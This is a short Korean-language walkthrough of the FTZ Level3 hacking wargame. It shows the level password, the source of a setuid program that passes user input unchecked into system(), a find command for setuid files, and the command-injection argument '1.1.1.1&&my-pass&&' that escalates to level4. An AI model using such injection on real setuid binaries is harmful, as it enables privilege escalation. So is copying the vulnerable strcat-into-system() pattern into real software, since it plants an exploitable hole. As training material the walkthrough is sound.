[FTZ] Level3 풀이

💡 FTZ Level3 풀이

문제

계정 : level3/can you fly?

hint

다음 코드는 autodig의 소스이다.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv){

    char cmd[100];

    if( argc!=2 ){
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }

    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");

    system( cmd );

}

이를 이용하여 level4의 권한을 얻어라.

more hints.
- 동시에 여러 명령어를 사용하려면?
- 문자열 형태로 명령어를 전달하려면?

풀이

setuid가 걸린 파일을 찾아 줍니다.

find / -perm -4000 -user level4 2>/dev/null

힌트에 나와있는 코드를 분석하면, 사용자의 입력값으로 다음과 같이 cmd 문자열이 완성됩니다.

dig @[입력 값] version.bind chaos txt

입력 값에 다음과 같이 작성하여 명령어가 여러개의 명령어가 수행되도록 해줍니다.

입력 값

/bin/autodig  '1.1.1.1&&my-pass&&'